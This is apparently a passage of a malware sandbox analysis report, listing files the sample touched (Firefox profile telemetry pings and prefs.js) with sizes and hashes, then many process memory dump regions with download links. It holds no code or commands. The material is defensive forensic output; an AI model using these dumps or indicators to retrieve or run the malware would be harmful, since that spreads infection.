                                                                                                                                                      2a24f719e9028a3e9b8844861b11e241d36d2f0bc4a30f274d345c07a7d559a4

                                                                                                                                                      SHA512

                                                                                                                                                      ee673b73e7b533ec97beece8cf0f7b04f06751f8470a7febe26d2900c2ac52b0fe3fbd9c872cee0b11c33ee0c5391ae790a2292ed919819b6df8c632f18a2ffe

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\59f30d5e-a9e3-40e6-bcdb-996afea02a67
                                                                                                                                                      Filesize

                                                                                                                                                      886B

                                                                                                                                                      MD5

                                                                                                                                                      d40aeb426c42618647e54dc498705545

                                                                                                                                                      SHA1

                                                                                                                                                      8a3369fb06dda9bff3c58e5b51b460b7aa38aa8b

                                                                                                                                                      SHA256

                                                                                                                                                      f4df4c8007a7de05162fe815e31d57c2cede1909da960b8f8d57dfd85e6ed1e1

                                                                                                                                                      SHA512

                                                                                                                                                      6f3fd9c29a7050c7847a6a7670843e6b08fa87a65aef30c9ef5cd887d9db080f5aef54e431e4fddf4a1ef32c20e599d8d1196cca24d4324520d4c89b6d4dc189

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\64f9d3a7-f02f-4d0b-84ca-716b4fb53cf1
                                                                                                                                                      Filesize

                                                                                                                                                      235B

                                                                                                                                                      MD5

                                                                                                                                                      0926953b43958ace49979fbf7a2d757d

                                                                                                                                                      SHA1

                                                                                                                                                      0c19ee64bcd1b660d3ad440078f289fa57f72ffc

                                                                                                                                                      SHA256

                                                                                                                                                      ba0e8abd3ea20301a16e1671eafb070300848d6ec47947f68ab568b26403e782

                                                                                                                                                      SHA512

                                                                                                                                                      646fad553c743d30e2d182e86c2f373c8bc5a606399e0fffa66890c4a9f2a29eb116c21d916a3dafb2e86ada53268a490daaefc2bee7f9226f7d8927d8b20bfd

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\9db55446-c2bc-4e76-84ef-fede20e302f1
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      8873b000a75d8f511af5e1701f156009

                                                                                                                                                      SHA1

                                                                                                                                                      53b5d2662b2c2e9ea3eb53193ef60bfe6fec9862

                                                                                                                                                      SHA256

                                                                                                                                                      8f29db7f2b2b22f88829c5f77f532a04140420204f99486aad8377a3c643210a

                                                                                                                                                      SHA512

                                                                                                                                                      1dab50fddb1570fe2476c7545180566c28e0cb1e7532da1b1b36ae5727ae628483d6902ee08ef6a2b339867b89ef457285ed95ec962aeffc963efc7a2a13876e

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\f2c7773e-72c6-4b1d-9495-1d2323b70543
                                                                                                                                                      Filesize

                                                                                                                                                      235B

                                                                                                                                                      MD5

                                                                                                                                                      4b7b9e786d1478861980b34865291469

                                                                                                                                                      SHA1

                                                                                                                                                      05df3e39d2d7d16161cf11e278289e035a66ae00

                                                                                                                                                      SHA256

                                                                                                                                                      86dd6809b63ee75df658cca0bddd2917d576e7e0b22f4e704ef18d0c12cc394b

                                                                                                                                                      SHA512

                                                                                                                                                      f236f80558f0cd283d69b1de950133bbddc52c25028691d97742ce1c0f20d71abe9f2dd141f1b5df123d6827277fa7c36ecb5b05728da28937944e47216b89bf

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\fc00d2c1-b3ab-4106-8c09-b7ba7753bef7
                                                                                                                                                      Filesize

                                                                                                                                                      7KB

                                                                                                                                                      MD5

                                                                                                                                                      a14ec29cf9c393f950dd70c43dc39c65

                                                                                                                                                      SHA1

                                                                                                                                                      87d794e0bdd4dbfe72aa0d39b5fcec2692300fbc

                                                                                                                                                      SHA256

                                                                                                                                                      e597c3528ce755f2d5604e813f1e6cca986524c38e04b51ea8f10d70ca1f6260

                                                                                                                                                      SHA512

                                                                                                                                                      9018819af3680a8a033a4eedaeed458ec286492d25394e3e9178a698fa5b72a103680407c9bdd1570b344b4011c661c633d43378f3fd1009954f2284cf5de54f

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\prefs-1.js
                                                                                                                                                      Filesize

                                                                                                                                                      6KB

                                                                                                                                                      MD5

                                                                                                                                                      94f8f8e874cda69c2eed66833170d800

                                                                                                                                                      SHA1

                                                                                                                                                      f9d386c9b7c6bed01f0311c1ffe9832e3d64401c

                                                                                                                                                      SHA256

                                                                                                                                                      2ef06f49703b9068d24ddc0b038ceab796fdd98b5a0667e5b25ccb0616d6a971

                                                                                                                                                      SHA512

                                                                                                                                                      cf17e0aab8382751b08e4c1cc3d74ef89cad43c28526f36364aeb9d191c5986e8571e7fe5a13fa51014ead91dc3ed8a8901cba3ceab000862df5873b93a997e7

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\prefs.js
                                                                                                                                                      Filesize

                                                                                                                                                      6KB

                                                                                                                                                      MD5

                                                                                                                                                      0bb41396c81a270b625ea1543bbc0ab6

                                                                                                                                                      SHA1

                                                                                                                                                      245d02db7aa0a8b61f1524584770383c2eb86ad4

                                                                                                                                                      SHA256

                                                                                                                                                      b5f36c0351a14cbf9f97f8e53c00e35de6b8655e653c9c51710f2b01b3eb1765

                                                                                                                                                      SHA512

                                                                                                                                                      4bd37af2c65ac1784634794b9c861c010f3fb5a8b90a27916250c42dcb781ad871b71151081c3a1b2d13de23cdc04204faf6467b0926c45fa365197547ec31e0

                                                                                                                                                      Download Submit

                                                                                                                                                    • memory/512-32-0x00000000008B0000-0x0000000000D75000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/512-47-0x00000000008B0000-0x0000000000D75000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-6-0x0000000005CA0000-0x0000000005D06000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      408KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-2-0x0000000002CF0000-0x0000000002D26000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      216KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-3-0x0000000005520000-0x0000000005B48000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.2MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-20-0x0000000006820000-0x000000000683A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      104KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-19-0x0000000007C10000-0x000000000828A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.5MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-22-0x00000000077B0000-0x0000000007846000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      600KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-18-0x0000000006380000-0x00000000063CC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      304KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-17-0x00000000062D0000-0x00000000062EE000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      120KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-16-0x0000000005D10000-0x0000000006064000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-23-0x0000000007740000-0x0000000007762000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-24-0x0000000008840000-0x0000000008DE4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.6MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-4-0x0000000005430000-0x0000000005452000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/700-5-0x0000000005BC0000-0x0000000005C26000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      408KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1076-1032-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      400KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1076-1033-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      400KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1252-2167-0x00000000070A0000-0x00000000070B4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      80KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1252-2165-0x0000000007040000-0x0000000007051000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      68KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1252-2153-0x000000006FF60000-0x000000006FFAC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      304KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1252-2163-0x0000000006CE0000-0x0000000006D83000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      652KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1660-531-0x0000000000590000-0x0000000000A34000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.6MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1660-499-0x0000000000590000-0x0000000000A34000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.6MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1748-1833-0x00007FFE47F90000-0x00007FFE48185000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1748-1817-0x00000000008F0000-0x000000000098E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      632KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1748-1819-0x000000006E9A0000-0x000000006E9EF000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      316KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1748-1818-0x0000000000A90000-0x0000000000CCD000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.2MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1876-184-0x0000017FFD3D0000-0x0000017FFD3F2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1880-1265-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1880-288-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1880-353-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1880-1159-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1880-431-0x0000000010000000-0x000000001001C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      112KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1880-459-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/1880-291-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-102-0x0000000007C20000-0x0000000007C2A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-122-0x0000000007EE0000-0x0000000007EE8000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-119-0x0000000007DE0000-0x0000000007DEE000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      56KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-89-0x00000000079F0000-0x0000000007A22000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      200KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-100-0x00000000079D0000-0x00000000079EE000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      120KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-117-0x0000000007DB0000-0x0000000007DC1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      68KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-120-0x0000000007DF0000-0x0000000007E04000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      80KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-121-0x0000000007EF0000-0x0000000007F0A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      104KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-90-0x000000006FF60000-0x000000006FFAC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      304KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2112-101-0x0000000007AF0000-0x0000000007B93000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      652KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2548-1222-0x0000012A6FD90000-0x0000012A6FD9A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2548-1221-0x0000012A6FFF0000-0x0000012A7000C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      112KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2564-594-0x0000000000720000-0x0000000000B90000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.4MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2564-601-0x0000000000720000-0x0000000000B90000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.4MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2564-1015-0x0000000000720000-0x0000000000B90000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.4MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2564-605-0x0000000000720000-0x0000000000B90000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.4MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2564-1011-0x0000000000720000-0x0000000000B90000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.4MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2652-334-0x0000000000400000-0x0000000000CE7000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8.9MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2652-352-0x0000000000400000-0x0000000000CE7000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8.9MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2704-1134-0x00007FF6C4AB0000-0x00007FF6C5001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2704-332-0x00007FF6C4AB0000-0x00007FF6C5001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2704-261-0x00007FF6C4AB0000-0x00007FF6C5001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2704-1653-0x00007FF6C4AB0000-0x00007FF6C5001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2704-426-0x00007FF6C4AB0000-0x00007FF6C5001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2704-1296-0x00007FF6C4AB0000-0x00007FF6C5001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2704-987-0x00007FF6C4AB0000-0x00007FF6C5001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2704-528-0x00007FF6C4AB0000-0x00007FF6C5001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2816-281-0x0000000000400000-0x0000000000E04000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.0MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/2816-293-0x0000000000400000-0x0000000000E04000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.0MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/3980-423-0x0000000000200000-0x00000000006A4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.6MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/3980-371-0x0000000000200000-0x00000000006A4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.6MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4428-1152-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      400KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4428-1153-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      400KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4428-295-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4620-218-0x000001276D260000-0x000001276D422000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-129-0x000000000D570000-0x000000000D732000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-72-0x0000000006630000-0x000000000667C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      304KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-127-0x000000000D0C0000-0x000000000D110000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      320KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-126-0x000000000CE70000-0x000000000CE7A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-78-0x0000000007BF0000-0x0000000007CE8000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      992KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-77-0x0000000003050000-0x0000000003058000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-74-0x0000000007990000-0x0000000007A22000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      584KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-125-0x000000000CDE0000-0x000000000CDFA000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      104KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-70-0x0000000005FD0000-0x0000000006324000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-124-0x000000000CC60000-0x000000000CDB4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-128-0x000000000D1D0000-0x000000000D282000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      712KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-136-0x000000000DE30000-0x000000000DE6C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      240KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-135-0x000000000DDD0000-0x000000000DDE2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      72KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4764-130-0x000000000D740000-0x000000000D78E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      312KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4868-1675-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4868-1650-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4868-615-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4868-457-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4868-348-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4868-350-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      184KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-466-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-205-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-46-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-299-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-1199-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-76-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-75-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-370-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-916-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-1686-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/4968-1035-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/5232-1196-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      400KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/5232-1197-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      400KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/5412-1660-0x00007FF7EE920000-0x00007FF7EEE71000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.3MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/5528-468-0x00000000002D0000-0x0000000000795000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/5528-490-0x00000000002D0000-0x0000000000795000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6040-1005-0x0000000000400000-0x00000000008C1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6040-1828-0x0000000000400000-0x00000000008C1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6040-1003-0x0000000000400000-0x00000000008C1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6040-1144-0x0000000000400000-0x00000000008C1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6040-1297-0x0000000000400000-0x00000000008C1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6040-1143-0x0000000000400000-0x00000000008C1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6076-501-0x00007FF6AC6C0000-0x00007FF6ACD34000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.5MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6076-455-0x00007FF6AC6C0000-0x00007FF6ACD34000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.5MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6260-2274-0x000001C354100000-0x000001C354108000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6260-2275-0x000001C354110000-0x000001C35411A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6288-1844-0x00000000005B0000-0x000000000064E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      632KB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6564-1470-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6564-1458-0x00000000003E0000-0x00000000008A5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.8MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6872-2120-0x0000000000190000-0x000000000063A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.7MB

                                                                                                                                                      Download

                                                                                                                                                    • memory/6872-2013-0x0000000000190000-0x000000000063A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4.7MB

                                                                                                                                                      Download